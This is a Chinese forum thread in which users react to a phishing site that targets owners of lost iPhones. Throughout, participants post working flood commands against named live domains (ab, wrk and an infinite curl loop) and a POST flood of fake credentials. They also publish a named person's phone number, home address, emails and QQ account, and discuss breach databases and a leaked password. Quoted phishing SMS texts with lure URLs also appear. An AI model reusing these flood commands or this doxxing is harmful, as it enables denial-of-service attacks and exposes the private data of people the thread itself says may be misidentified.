MMP 的钓鱼网站

干得漂亮

围观

围观

举报之。

appiephone.

前几个月我也收到一条，为什么他们会知道你掉了手机？

个人所得税，哈哈。虽然楼主丢了手机，但是看到这段还是想笑。对不起。

@kaiji 丢手机肯定连着 SIM 卡一起丢。SIM 卡没 PIN 码的话放别的手机里面怎么都能知道号码。

大快人心，这种骗子

火钳刘明

卡巴斯基这么吊，我访问的时候，直接拦截了。。告诉我这是 钓鱼网站。。

嗯.. 当他不能访问的时候.. 楼下的朋友可以帮忙 @我一下么..哈哈.. 想围观

有效信息都这么多了，能破案不？

脚本可有 我这边一起爆

@ixinshang 刚开始我也是用脚本，后来朋友提醒，使用 ab 压测工具，分分钟爆站。

爆破菊发来贺电

没人来把后台管理帐号和密码搞出来吗？


爆站脚本贴出来

发短信到 12110 或者 12321 报案啊，钓鱼网站显然是属于网络诈骗的。。。

求爆破思路

林进标？？
报警这狗杂种吧。。。。。。

教教我怎么爆破?

名字都有了，WHOIS 又没有保护，这么多信息，把他出道了算了。

@WindsonYan 兄弟你以为我们之前会不试吗，就是因为监管不作为才只能自己动手，我举报的这类网站没一个会处理

lz 这个命令行的 whois 工具，分享下……

啊，我要用的 vps ab 压测试试

大快人心。
顺便补充一下：小偷偷到手机解不开锁，一般低价转手给专门回收有 ID 锁机器的二手贩子，二手贩子再找这些钓鱼网站来调取密码，解锁后按二手机贩卖。这个林进标应该只是整个链条的一环，如果报警抓到，说不定能顺藤摸瓜带出一堆人。

@timothyye mac 自带

直接 ab 压测了一下 www.appeiphone.cn 页面就出错了，看来还是 ASP.NET 的干活






压测命令：ab -n 10000 -c 100 http://www.appeiphone.cn/

ixiaohei 之前一直没发现……

已经被玩坏了..... 还想进去看看呢.

来晚了，你们都不让我玩一会儿 （手动滑稽

http://www.app-im.cn/?WKNEB=14474.html 这个还可以玩。

@ranleng
@smilenceX

http://whois.chinaz.com/reverse?host=%E6%9E%97%E8%BF%9B%E6%A0%87&ddlSearchMode=2&page=4

里面的网站都是他名下的，很大一部分是钓鱼网站，你们可以去玩玩

@timothyye 这个命令很好用，我是看电影学来的，(手动滑稽。。

这个站已经死求了 ！

ab -n 1000 -c 1000 -p post.txt -T 'application/x-www-form-urlencoded' http://www.app-im.cn/save.ap

post.txt 内容是 u=123456&p=12345&x=4&y=10

给一条信息，其中一个 QQ 找出来的，关于黑客工具的

诚招代理 dipush 找 Q317019525

?from=s1.8-1-1.2

接我刚才发的，在视频里看到一个邮箱 [email protected]

我刚试了又能打开了，求爆破思路和工具。

用这家伙的名字和邮箱，搜不出来太多信息

相关的百度贴吧账号
http://tieba.baidu.com/home/main?un=Q317019525&ie=utf-8&fr=pb&ie=utf-8
相关的网站业务
http://www.pngx.com/ 西部的代理
还有一个私人贴吧弘网科技吧
https://tieba.baidu.com/f?kw=%E5%BC%98%E7%BD%91%E7%A7%91%E6%8A%80&fr=home

天眼查的信息 https://www.tianyancha.com/company/2317597321

安阳弘网科技有限公司
电话：13343680205 邮箱： [email protected]
网址：www.pngx.com 地址： 安阳市北关区平原路与安漳大道交叉口西南角桂花苑小区 3 号楼 1 单元 301 室

干得漂亮！不过好像差不出来太多内容，这种东西举报也没什么效果，换个网址照样继续干

强势围观！

@artoostark #44 给力！

厉害厉害。

@nauynah #38 可以用 [进程替换（ Process Substitution ）]
ab -n 1000 -c 1000 -p <(echo 'u=123456&p=12345&x=4&y=10') -T 'application/x-www-form-urlencoded' http://www.app-im.cn/save.asp

围观

再贴张图，接上面。
https://i.loli.net/2017/08/02/598192529f32c.png

我就看看

666 膜拜大佬

支持

你把所有的证据都帮他们找出来，摆在他们面前，看他们会不会管？（我赌 5 毛基本不会）

怎么举报这种诈骗的

这个公司注册了好多域名，把我想注册的给注册了

报警更大的可能是没人管，早就对赵家狗失望了

@conglovely 最简单的，从 chrome 提取一下提交信息
先 F12 进 Network，填好信息提交的时候按 esc，看到有一条 cancel 的记录，右键复制 copy->copy as cURL
curl 可以直接干，脚本最简单就是

for((i=0;i<20;++i));do while :;do

{{Curl command goes here}}

done;

玩的开心）

我也遇到了，我手机丢的时候。钓鱼我，和你情况一样

Apple 安全服务中心

用户您好：您的 iPhone 设备正在在官网申请解锁，如果不是本人申请解锁，请立即登录 www.appid.idzte.com 选择右上角“拒绝激活”如果没有操作选项“拒绝激活”系统在 24 小时内默认激活设备,请忽略此信息.
[Find My iPhone]

Apple 授权服务中心

尊敬的用户，您好：
您开启丢失模式的 iPhone 设备正在苹果服务中心申请解锁及换新业务。如果非本人操作，请立即前往 www.appleid.idtal.com 进行拦截并验证您的个人信息，如果验证通过我们将暂扣该设备，并及时通知您领回遗失的设备。如果是您本人操作，请忽略此条短信。

此致

Apple 支持

这网站还能玩啊..

支持

虽说解气,不过大多时候手机还是拿不回来

歇歇吧各位，把网站搞掉可以。名字肯定不是作恶者本人……

哇，还是 .cn 域名。

我同意 66 楼的观点。。

信息不一定是本人的，核实下外面误伤

反查了下，统统在 12321.cn 举报了。

@yu1u 说的对，人不会傻成这样吧

公司注册备案的 可以发律涵 A 一笔然后让其关闭。

wrk -c 1000 -d 60s -t 5 http://www.app-im.cn/

然后我在社工库查到了他的密码

强势围观、、先评再看。

@ifconfig
@artoostark

很精彩的操作。

学一下操作

支持，干死他狗 X 的钓鱼骗子

干的漂亮，进来学习经验了

干得漂亮，不管赵家管不管，至少先把他拉上街示众的。

@ifconfig 他的密码我有完整的 但是改过

厉害了

[email protected] 6882159 现在不正确了

@timothyye 请问 ab 这个命令在哪安装呢,win10 没这个命令啊

@freestyleyooo #84 是 Apache 自带的

@F0nebula #49
@nauynah @ossicee
那个 还可以用
<(<<<'u=123456&p=12345&x=4&y=10')
ref: http://ahei.info/bash.htm#sec-3

@freestyleyooo apt-get install apache2-utils

win10 估计没有，linux 下可以这么装

看了这个帖子。。学习了

@XueRainey 还好吧，一般般，皮毛都学的不是很好。以前实际实践过社会工程学，算是有点经验。

@ifconfig 请问你还有没有可以访问的 QQ 群社工库，我之前用的几个好像都关站了，翻墙也上不去。

我就是林进标，你个龟儿子，又爆我站

@yanghong502 我就是这个站的站长，但是没有 qq 群社工库哦

@ifconfig #92 不知道你的站的架构是什么样的？感觉你的站可能会被查水表关了，想自己搭一个自己用呢？能联系下么？